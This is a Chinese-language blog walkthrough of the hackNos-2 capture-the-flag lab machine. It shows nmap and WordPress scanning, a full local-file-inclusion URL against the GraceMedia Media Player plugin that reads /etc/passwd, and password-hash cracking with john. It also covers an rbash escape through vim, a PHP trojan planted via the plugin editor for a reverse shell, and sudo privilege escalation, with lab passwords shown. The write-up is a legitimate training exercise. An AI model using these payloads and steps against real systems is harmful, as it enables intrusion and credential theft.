hackNos-2
2020-02-11-14——2020-02-12-13
1 | Difficulty : Easy to Intermediate |
1 | Kali:192.168.56.109 |
信息收集
主机存活扫描:
1 | $ nmap -n -sn -T5 -v 192.168.56.1/24 | grep -B 1 "Host is up" |
找到目标地址后,扫面服务及操作系统:
1 | $ nmap -n -Pn -sV -O 192.168.56.113 |
1 | PORT STATE SERVICE VERSION |
枚举
访问 80 端口,略过 Apache 的干扰视线页面,直接扫目录:
目录访问如下:
1 | http://192.168.56.113/index.html # Apache 页面,无有价值信息 |
WordPress 扫描:
Cmseek:简单扫描wpscan:详细扫描
1 | cmseek.py -u http://192.168.56.113/tsweb |
WP 一般就是插件方面的漏洞比较多,searchsploit 也多是插件与主题的漏洞,扫得:
- 插件:
gracemedia-media-playerversion 1.0 - 用户名:
user
试着爆破一下后台 wp-admin ,需要收集一些社工资料,在tsweb 主页有个 about
得到靶机作者姓名,然后生成字典,Burp 跑爆破,无果……
回到上一步,搜索 gracemedia-media-player 插件,有个 LFI 漏洞,利用成功,得到一个用户:
1 | http://192.168.56.113/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd |
WordPress GraceMedia Media Player 1.0 Local File Inclusion
1 | flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash |
/etc/passwd 的格式中,第一栏是 用户名 ,第二栏是 密码 ,破解 Hash,各大破解网站都试了一遍,除了 cmd5.com 有记录外(付费),其他要么不识别,要么无此条目
登陆
搜了一下 Write-up ,使用 Jhon 破解。得到密码(topsecret):
1 | john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long 1.hash |

登录 SSH 成功,shell 为 rbash ,一个受限制的 shell ,使用 Vim 绕过:
1 | vim |
信息收集
查看 sudo -l 可以干什么
1 | sudo -l |
想到之前在 /etc/passwd 看到还有一个 rohit 用户,HOME 目录有访问权,无查看权,需要提权
搜一波相关内容文件,得到 rohit 的密码哈希,丢后台破解:
1 | grep -ri --color=auto --exclude-dir=proc/ 'rohit' / 2>/dev/null |
继续收集信息,有 WordPress 肯定就有配置文件和 MySQL,进入网站根目录下:
ls -al 显示着唯一同时具备 rw 权限的文件,有猫腻,得到数据库名及一组用户名密码:
1 | # DA_NAME: |

登录数据库:
1 | $ mysql -h localhost -u wpuser -p hackNos-2.com |
1 | SELECT * FROM wp_users; |
又得到一组用户名与密码(被加密),有密码需要破解,又没钱,只能看 Write-up ,可以改密码:
1 | user:$P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2 |
1 | # 改密码为 user |
目前账号信息:
1 | # 低权限用户(rbash),已经无价值了 |
反弹 shell
后台密码破解中。先去 WordPress 后台看看
登录 WordPress 后台,试着能不能上传文件,反弹个 shell ,添加的新文章内添加代码被直接显示出来,不被渲染,还有个 插件编辑 的,写入 PHP 木马,监听端口,访问木马页面,反弹成功,www-data 用户:
1 | # 获取一个交互式 shell |
一波查看,这个用户似乎也干不了什么大事,权限也不够
提权
rohit 的密码没跑出来, cmd5.com 收费,若是真实渗透的话,充值一下也无所谓
这里直接看的 Write-up ,密码明文:!%hack41
SSH 登录 rohit ,看看可以干什么……ALL。查看 HOME 目录,得到一个 FLAG 和 一个 MD5 Hash:
1 | sudo -l |
查看是否还有其他有价值的信息:ls -al , (o゜▽゜)o☆[BINGO!]
1 | .sudo_as_admin_successful |
这个可使用 rohit 的密码切换成为 root 用户,得到 root.txt
这里似乎登录 WordPress 后台没什么作用,只是扩大了信息,或许以后会发现他的用处
这里难的地方就是 Hash 破解了吧,没台好机器,没个好字典,没个好在线工具
看了一下别人的 Write-up 发现自己忽略了一个提权方式(这就是缺乏经验吧……):
1 | /usr/bin/passwd |
搜索 SUID 的时候,出现的 sudo 和 passwd 可以配合修改 root 的密码
因为 flag 用户不在 sudoers 中,无法提权,但是 rohit 在。
这里就是为了记一下, sudo 和 passwd 同时有 SUID 权限,且用户位于 /etc/sudoers 中的时候,可以修改 root 密码
- 本文链接:https://mr-potatoz.github.io/2020/03/10/hackNos-2/
- 版权声明:欢迎转载、引用,但请标明作者和原文地址,谢谢。 :D